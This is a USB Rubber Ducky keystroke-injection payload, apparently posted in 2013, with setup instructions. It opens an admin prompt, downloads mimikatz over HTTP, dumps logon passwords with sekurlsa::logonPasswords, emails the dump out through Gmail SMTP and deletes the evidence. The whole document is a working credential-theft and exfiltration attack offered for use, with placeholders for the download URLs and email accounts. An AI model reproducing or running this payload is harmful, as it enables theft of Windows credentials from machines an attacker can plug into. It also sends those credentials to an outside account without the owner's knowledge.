This payload: 1. Downloads appropriate mimikatz version via http (I used dropbox) 2. Opens a admin prompt 3. saves mimikatz log to file 4. emails log via gmail please change these lines to something (keep the single quote): 'url to 32bit mimikatz.exe' 'url to 64bit mimikatz.exe' 'gmailuser', 'gmail password' 'sending email account' 'email account to send report' Sorry about the wacky delays! ``` REM Author: Pesce REM Date: 10/20/2013 REM Note: Thanks to all the help everyone! This is my first attempt, don't be to upset! REM -------------open command prompt with admin privileges DELAY 3000 CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 CTRL-SHIFT ENTER DELAY 1000 ALT y ENTER DELAY 300 REM -------------download appropriate mimikatz for architecture STRING powershell if ([System.IntPtr]::Size -eq 4) { (new-object System.Net.WebClient).DownloadFile('http://url to 32bit mimikatz.exe','%TEMP%\pw.exe'); }else{ (new-object System.Net.WebClient).DownloadFile('http://url to 64bit mimikatz.exe','%TEMP%\pw.exe');} ENTER DELAY 5000 REM -------------get the passwords and save to c:\pwlog.txt STRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt; ENTER DELAY 2000 STRING privilege::debug ENTER DELAY 1000 STRING sekurlsa::logonPasswords full ENTER DELAY 1000 STRING exit ENTER DELAY 300 STRING del %TEMP%\pw.exe ENTER DELAY 300 REM -------------email log via gmail STRING powershell ENTER DELAY 300 STRING $SMTPServer = '' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('gmailuser', 'gmail password'); ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'sending email account' ENTER STRING $ReportEmail.To.Add('email account to send report') ENTER STRING $ReportEmail.Subject = 'Duck Report' ENTER STRING $ReportEmail.Body = 'Attached is your duck report.' ENTER STRING $ReportEmail.Attachments.Add('c:\pwlog.txt') ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 1000 STRING exit ENTER REM ---------------------delete and end STRING del c:\pwlog.txt ENTER DELAY 300 STRING exit ENTER ```